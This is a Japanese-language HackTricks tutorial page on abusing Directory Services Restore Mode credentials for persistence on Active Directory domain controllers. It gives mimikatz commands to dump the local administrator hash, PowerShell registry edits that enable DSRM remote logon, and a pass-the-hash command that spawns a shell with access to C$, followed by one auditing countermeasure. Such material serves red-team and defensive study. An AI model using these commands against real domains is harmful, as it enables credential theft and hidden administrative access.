hacktricks/windows-hardening/active-directory-methodology/dsrm-credentials.md

ゼロからヒーローまでAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

HackTricks をサポートする他の方法:

• HackTricks で企業を宣伝したいまたは HackTricks をPDFでダウンロードしたい場合は SUBSCRIPTION PLANS をチェックしてください！
• 公式PEASS＆HackTricksスワッグを入手する
• The PEASS Familyを発見し、独占的な NFTsコレクションを見つける
• **💬 Discordグループに参加するか、telegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
• ハッキングトリックを共有するためにPRを提出して HackTricks と HackTricks Cloud のgithubリポジトリに。

DSRM 資格情報

各 DC 内には ローカル管理者 アカウントがあります。このマシンで管理者権限を持っていると、mimikatz を使用して ローカル管理者のハッシュをダンプ できます。その後、レジストリを変更してこのパスワードを アクティブ化 し、このローカル管理者ユーザーにリモートアクセスできます。
まず、DC内の ローカル管理者 ユーザーの ハッシュ を ダンプ する必要があります：

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

次に、そのアカウントが機能するかどうかを確認し、レジストリキーの値が「0」であるか存在しない場合は、それを「2」に設定する必要があります：

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

次に、PTHを使用してC$の内容をリストしたり、シェルを取得したりすることができます。注意すべきは、そのハッシュを使用してメモリ内で新しいPowerShellセッションを作成する場合（PTHの場合）、使用される「ドメイン」はDCマシンの名前だけであることです。

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

対策

• イベントID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior の作成/変更の監査

詳細はこちら：https://adsecurity.org/?p=1714 および https://adsecurity.org/?p=1785